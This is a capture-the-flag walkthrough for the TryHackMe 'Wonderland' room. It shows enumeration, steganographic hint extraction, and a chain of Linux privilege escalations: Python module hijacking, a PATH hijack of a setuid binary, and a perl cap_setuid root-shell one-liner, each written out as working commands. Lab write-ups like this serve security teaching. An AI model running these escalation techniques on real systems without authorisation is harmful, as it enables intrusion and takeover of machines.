Info

Name: Wonderland
Difficulty: Medium
Released: Fri 05 Jun 2020
Creator: NinjaJc01
URL: https://tryhackme.com/room/wonderland

Enumeration

As always we start with a nmap scan of the machine:

nmap -sC -sV -oA nmap/all-tcp 10.10.167.35
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-05 23:56 CEST
Nmap scan report for 10.10.167.35
Host is up (0.046s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We only have two ports open: 22 and 80.

Visiting the web server reveals the following page:

We also do a directory scan with ffuf and find the following directories:

ffuf -u http://10.10.167.35/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.1.0-git
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.167.35/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

img                     [Status: 301, Size: 0, Words: 1, Lines: 1]
poem                    [Status: 301, Size: 0, Words: 1, Lines: 1]
r                       [Status: 301, Size: 0, Words: 1, Lines: 1]
:: Progress: [20473/20473] :: Job [1/1] :: 853 req/sec :: Duration: [0:00:24] :: Errors: 0 ::

After looking at the different directories I didn't find anything of interest, so I decided to download the first image we found and see if something was hidden in it.

wget http://10.10.167.35/img/white_rabbit_1.jpg
--2020-06-06 00:04:02--  http://10.10.167.35/img/white_rabbit_1.jpg
Connecting to 10.10.167.35:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1993438 (1.9M) [image/jpeg]
Saving to: ‘white_rabbit_1.jpg’

white_rabbit_1.jpg	100%[==============================================================>]   1.90M  4.57MB/s    in 0.4s    

2020-06-06 00:04:02 (4.57 MB/s) - ‘white_rabbit_1.jpg’ saved [1993438/1993438]

steghide extract -sf white_rabbit_1.jpg 
Enter passphrase: 
wrote extracted data to "hint.txt".
s1gh@kali:~/TryHackMe/Wonderland/files$ cat hint.txt 
follow the r a b b i t

My immiediate thought was that r a b b i t was that this might be pointing to an URL:

Looking at the source reveals something that looks like credentials:

We can now use the credentials above and SSH into the box.

Initial Foothold

We now have access to the machine, but by doing a ls -la we notice something something weird. The root.txt file is located in our users directory...

ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25 17:52 .
drwxr-xr-x 6 root  root  4096 May 25 17:52 ..
lrwxrwxrwx 1 root  root     9 May 25 17:52 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25 02:36 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25 02:36 .bashrc
drwx------ 2 alice alice 4096 May 25 16:37 .cache
drwx------ 3 alice alice 4096 May 25 16:37 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25 02:52 .local
-rw-r--r-- 1 alice alice  807 May 25 02:36 .profile
-rw------- 1 root  root    66 May 25 17:08 root.txt
-rw-r--r-- 1 root  root  3577 May 25 02:43 walrus_and_the_carpenter.py

After a bit of thinkering (and looking at the hint) we try to cat /root/user.txt.

cat /root/user.txt
thm{FLAG-REDACTED}

We finally have the user flag! Now, let's priv esc to root.

Privilege Escalation

Looking at our privileges with sudo -l reveals the following:

sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

We can run sudo /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py as the user rabbit.

Even though we only have read access to walrus_and_the_carpenter.py and can't edit the file, let's see what the file is doing when executed.

import random                                                                                                                                                                                                                              
poem = """The sun was shining on the sea,                                                                                                                                                                                                  
Shining with all his might:                                                                                                                                                                                                                
He did his very best to make                                                                                                                                                                                                               
The billows smooth and bright —                                                                                                                                                                                                            
And this was odd, because it was                                                                                                                                                                                                           
The middle of the night.                                                                                                                                                                                                                   
                                                                                                                                                                                                                                           
The moon was shining sulkily,                                                                                                                                                                                                              
Because she thought the sun                                                                                                                                                                                                                
Had got no business to be there                                                                                                                                                                                                            
After the day was done —                                                                                                                                                                                                                   
"It’s very rude of him," she said,                                                                                                                                                                                                         
"To come and spoil the fun!"                                                                                                                                                                                                               
                                                                                                                                                                                                                                           
The sea was wet as wet could be,
The sands were dry as dry.
You could not see a cloud, because
No cloud was in the sky:
No birds were flying over head —
There were no birds to fly.

The Walrus and the Carpenter
Were walking close at hand;
They wept like anything to see
Such quantities of sand:
"If this were only cleared away,"
They said, "it would be grand!"

[...]

for i in range(10):
    line = random.choice(poem.split("\n"))

Do to the length of the file, I've removed some of the poem that's printed to the screen when we're executing the file.

At the top of the file, we can see that the python module random is imported.
So, what if we create a file named random.py in our current working directory that executes /bin/bash? That way our python file should be loaded instead of the "real" random module, and in turn give us a shell as the rabbit user.

Our random.py:

import os

os.system("/bin/bash")

Executing the python script:

alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit

Awesome! We have escalated our privileges to the rabbit user.

Looking in /home/rabbit/ we find a setuid binary, and by examining the file we see that date is executed without specifying an absolute path:

Welcome to the tea party!
The Mad Hatter will be here soon.
/bin/echo -n 'Probably by ' && date --date='next hour' -R
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)

We can abuse this by exporting our own $PATH, writing a small script called date and running the setuid binary.

Exporting our own $PATH:

rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

Now, everytime a program is called without specifying an absolute path, our shell will first look in /tmp.

Creating our malicious date file

We now create a shell script called date, place that in /tmp and make it executable with chmod +x /tmp/date.

rabbit@wonderland:/home/rabbit$ cat /tmp/date
#!/bin/bash
/bin/bash

All we now need to do is run the setuid binary and we should escalate to the user hatter.

rabbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$ 
hatter@wonderland:/home/rabbit$ whoami;id
hatter
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)

Awesome! We're getting close.

Looking in the home directory of the user hatter reveals a password in cleartext. Trying to ssh in with this password gives us a full shell as the user hatter:

ssh hatter@10.10.167.35
hatter@10.10.167.35's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jun  5 22:48:04 UTC 2020

  System load:  0.07               Processes:           95
  Usage of /:   19.4% of 19.56GB   Users logged in:     1
  Memory usage: 32%                IP address for eth0: 10.10.167.35
  Swap usage:   0%


0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri Jun  5 22:47:57 2020 from 10.11.4.205
hatter@wonderland:~$ whoami;id
hatter
uid=1003(hatter) gid=1003(hatter) groups=1003(hatter)

Doing some basic enumeration reveals that perl have the following capability set: cap_setuid+ep

hatter@wonderland:/home/rabbit$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

We can easily abuse this and escalate to root!

hatter@wonderland:~$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# whoami;id
root
uid=0(root) gid=1003(hatter) groups=1003(hatter)

We can now finally get the root.txt flag as well!

# cat /home/alice/root.txt
thm{FLAG-REDACTED}